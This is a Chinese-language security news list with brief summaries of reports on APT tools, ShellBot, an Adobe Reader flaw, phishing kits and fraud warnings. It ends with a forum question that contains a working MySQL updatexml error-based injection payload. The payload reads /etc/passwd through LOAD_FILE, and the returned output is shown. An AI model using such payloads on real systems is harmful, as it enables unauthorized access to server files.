文章列表
研究人员推出ToddyCat的一套新的数据泄露工具
被称为ToddyCat的高级持续性威胁(APT)参与者已与一组新的恶意工具相关联,这些工具旨在用于数据泄露,从而更深入地了解黑客团队的战术和能力。这些发现来自卡巴斯基,卡巴斯基去年首次揭示了对手,将其与近三年来针对欧洲和亚洲知名实体的攻击联系起来。虽然该组织的武器库突出了Ninja特洛伊木马和一
ShellBot使用Hex IP逃避对Linux SSH服务器的攻击检测
ShellBot背后的威胁行为者正在利用转换为十六进制符号的IP地址渗透管理不善的Linux SSH服务器并部署DDoS恶意软件。“整体流程保持不变,但威胁行为者用于安装ShellBot的下载URL已从常规IP地址更改为十六进制值,”AhnLab安全应急响应中心(ASEC)在今天发布的一份新报告中表示。ShellBot,也被称为Perl
美国网络安全局警告 Adobe Acrobat Reader 漏洞被积极利用
美国网络安全和基础设施安全局 (CISA) 周二将Adobe Acrobat Reader 中的一个高严重性缺陷添加到其已知被利用的漏洞 ( KEV ) 目录中,并引用了主动利用的证据。该漏洞编号为CVE-2023-21608(CVSS 评分:7.8),被描述为释放后使用错误,可利用当前用户的权限实现远程代码执行 (RCE)。Adobe 于 2023
安全,是「紧箍咒」还是「风火轮」?
命运的齿轮总是以一种出人意料的方式转动。2016年,移动办公逐渐兴起,出于自己远程办公的需要,腾讯开始用当时还只是一个前沿概念的零信任理念改造内网,持续了几年去做各种底层技术的摸索、体验的优化。当时并没有一个明确的KPI或者节点促使他们做这个事情,但是到后来疫情来袭的时候,之前这些工作
Google将密码作为所有用户的默认登录方式
谷歌周二宣布,所有用户都可以默认设置密钥,五个月前,谷歌在所有平台上推出了对FIDO联盟支持的谷歌账户无密码标准的支持。“这意味着下次登录帐户时,您将开始看到创建和使用密钥的提示,简化您未来的登录,”谷歌的Sriram Karra和Christiaan Brand说。“这也意味着你会在谷歌账户设置中看到‘可能时
网络犯罪分子使用EvilProxy网络钓鱼工具包瞄准美国的高级管理人员公司
在美国工作的高级管理人员-基于的组织正成为一种新的网络钓鱼活动的目标,该活动利用名为EvilProxy的流行中间对手(AiTM)网络钓鱼工具包进行凭据获取和帐户接管攻击。门洛Security表示,该活动始于2023年7月,主要针对银行和金融服务、保险、物业管理和真实的地产以及制造业。安全研究员Ravisankar Ra
金融监管部门提示:谨防“AI 换脸”等新型诈骗手段
10 月 9 日消息,近年来,不法分子不断翻新诈骗手段,让金融消费者防不胜防,个人财产安全受到严重威胁。IT之家注意到,国家金融监督管理总局北京监管局近日发布风险提示,提醒消费者近期重点防范三种新型欺诈手段,守护家人亲朋财产安全。骗局一:校园贷款连环套,又欠钱来又被骗国家金融监督管理总局
GitHub 的秘密扫描功能现已覆盖 AWS、微软、谷歌和 Slack
GitHub宣布改进其秘密扫描功能,将有效性检查扩展到 Amazon Web Services (AWS)、Microsoft、Google 和 Slack 等流行服务。微软子公司今年早些时候推出了有效性检查,可以提醒用户通过秘密扫描发现的暴露令牌是否处于活动状态,从而可以采取有效的补救措施。它首先是针对 GitHub 令牌启用的。基于云的
中国黑客利用钴攻击东亚半导体公司
据观察,威胁行为者利用伪装成台湾积体电路制造公司 (TSMC) 的诱饵瞄准东亚的半导体公司,这些诱饵旨在提供 Cobalt Strike 信标。根据EclecticIQ 的说法,入侵集利用了一个名为 HyperBro 的后门,然后将其用作部署商业攻击模拟软件和后利用工具包的渠道。据称,另一种攻击序列利用了之前未记录的恶意软
求助MySQL delete语句 updatexml报错注入问题? 求助大佬!
事情是这样的:被带入的数据库SQL:DELETE FROM polloptions WHERE polloptionid='146640' and updatexml(1,concat(0x7e,substr((select LOAD_FILE('/etc/passwd')),1,31),0x7e),1)-- +' AND tid='18'报错回显:XPATH syntax error: '~root:x:0:0:root:/root:/bin/bash'这个使用updatexml函数 报错注入
